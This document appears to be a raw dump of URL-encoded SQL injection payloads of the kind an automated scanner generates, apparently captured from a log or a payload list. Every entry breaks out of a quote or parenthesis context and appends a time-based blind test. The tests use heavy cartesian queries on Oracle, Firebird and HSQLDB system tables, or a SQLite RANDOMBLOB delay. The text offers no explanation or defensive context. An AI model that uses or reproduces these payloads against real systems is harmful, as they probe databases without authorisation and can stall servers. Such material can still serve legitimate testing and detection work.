-2337%22%29%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22EWmP%22%3D%22EWmP -7313%22%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22bmfv%22%3D%22bmfv -6582%22%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22MyTU%22%20LIKE%20%22MyTU -8050%22%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22HxDo%22%20LIKE%20%22HxDo -4615%22%29%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22upEe%22%20LIKE%20%22upEe -6470%22%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22WLhB%22%20LIKE%20%22WLhB -8360%25%27%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27%25%27%3D%27 -8287%25%27%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27%25%27%3D%27 -6540%25%27%29%29%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27%25%27%3D%27 -9991%25%27%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27%25%27%3D%27 -2997%00%27%29%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27hyty%27%3D%27hyty -9804%00%27%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27NbuT%27%3D%27NbuT -2653%27%29%20WHERE%208919%3D8919%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -3547%22%29%20WHERE%201259%3D1259%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -1388%29%20WHERE%207898%3D7898%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -7529%27%20WHERE%209913%3D9913%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -3876%22%20WHERE%207495%3D7495%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -5030%20WHERE%204732%3D4732%20OR%204667%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 -1343%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -3671%27%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -5663%27%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -6647%22%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -4889%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%285072%3D5072 -2169%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%281804%3D1804 -3676%29%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%284741%3D4741 -4999%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 -6493%27%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27DAcc%27%3D%27DAcc -7310%27%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27xfUU%27%3D%27xfUU -2653%27%29%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27VfvF%27%3D%27VfvF -2754%27%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27SuuG%27%3D%27SuuG -2664%27%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27eyJq%27%20LIKE%20%27eyJq -5615%27%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27OVyJ%27%20LIKE%20%27OVyJ -9449%27%29%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27Yyhw%27%20LIKE%20%27Yyhw -7430%27%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27cXjm%27%20LIKE%20%27cXjm -5593%22%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22pWVA%22%3D%22pWVA -3366%22%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22bOqh%22%3D%22bOqh -8861%22%29%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22WRzc%22%3D%22WRzc -6638%22%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22FZgX%22%3D%22FZgX -3326%22%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22zNPI%22%20LIKE%20%22zNPI -3997%22%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22XHAe%22%20LIKE%20%22XHAe -4190%22%29%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22HcxC%22%20LIKE%20%22HcxC -6339%22%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22ubCW%22%20LIKE%20%22ubCW -6058%25%27%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27%25%27%3D%27 -6318%25%27%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27%25%27%3D%27 -5785%25%27%29%29%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -4847%25%27%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27%25%27%3D%27 -5585%00%27%29%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27hehl%27%3D%27hehl -2536%00%27%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27ekWJ%27%3D%27ekWJ -4348%27%29%20WHERE%204652%3D4652%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -2178%22%29%20WHERE%209880%3D9880%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -4592%29%20WHERE%206710%3D6710%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -2670%27%20WHERE%209704%3D9704%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -5661%22%20WHERE%209053%3D9053%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -3730%20WHERE%203066%3D3066%20OR%205268%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 -5728%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -2253%27%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -5387%27%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -9792%22%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -9040%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%287307%3D7307 -9845%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%282403%3D2403 -5335%29%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%282759%3D2759 -8306%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 -3217%27%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27iwnk%27%3D%27iwnk -1908%27%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27uEOf%27%3D%27uEOf -5463%27%29%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27NtDk%27%3D%27NtDk -2841%27%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27lLRR%27%3D%27lLRR -7451%27%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27IdTj%27%20LIKE%20%27IdTj -4489%27%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27tDNg%27%20LIKE%20%27tDNg -8555%27%29%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27QpWT%27%20LIKE%20%27QpWT -8108%27%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27pcGg%27%20LIKE%20%27pcGg -6654%22%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22dhRO%22%3D%22dhRO -6961%22%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22vioN%22%3D%22vioN -9344%22%29%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22bDWO%22%3D%22bDWO -7603%22%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22dULb%22%3D%22dULb -1465%22%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%22yTLZ%22%20LIKE%20%22yTLZ -4032%22%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%22ldhd%22%20LIKE%20%22ldhd -6362%22%29%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%22zHAK%22%20LIKE%20%22zHAK -1720%22%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%22xJJt%22%20LIKE%20%22xJJt -7985%25%27%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27%25%27%3D%27 -4912%25%27%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%27%25%27%3D%27 -7984%25%27%29%29%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%28%28%27%25%27%3D%27 -9848%25%27%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27%25%27%3D%27 -2056%00%27%29%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27yXwR%27%3D%27yXwR -4861%00%27%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27SQgq%27%3D%27SQgq -2368%27%29%20WHERE%203672%3D3672%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -5021%22%29%20WHERE%205641%3D5641%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -5021%29%20WHERE%204767%3D4767%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -5067%27%20WHERE%201270%3D1270%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -6861%22%20WHERE%202086%3D2086%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -1414%20WHERE%207648%3D7648%20OR%206702%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -4388%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -9944%27%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -3636%27%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -4165%22%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -8305%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%282178%3D2178 -3492%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%282443%3D2443 -6711%29%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%284158%3D4158 -6781%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -3043%27%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27HpEI%27%3D%27HpEI -2088%27%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27lBfQ%27%3D%27lBfQ -2315%27%29%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27ZUSp%27%3D%27ZUSp -9302%27%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27SaQE%27%3D%27SaQE -4173%27%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27YfiV%27%20LIKE%20%27YfiV -6378%27%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27lfnx%27%20LIKE%20%27lfnx -6244%27%29%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27SlzY%27%20LIKE%20%27SlzY -6309%27%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27hyCp%27%20LIKE%20%27hyCp -7560%22%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22fdTz%22%3D%22fdTz -3095%22%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22pkVr%22%3D%22pkVr -2884%22%29%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22wPjz%22%3D%22wPjz -8018%22%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22NMsF%22%3D%22NMsF -3381%22%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22wSjy%22%20LIKE%20%22wSjy -4800%22%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22EiSO%22%20LIKE%20%22EiSO -7348%22%29%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22RVQn%22%20LIKE%20%22RVQn -1864%22%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22fJid%22%20LIKE%20%22fJid -4997%25%27%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 -5606%25%27%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 -9115%25%27%29%29%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 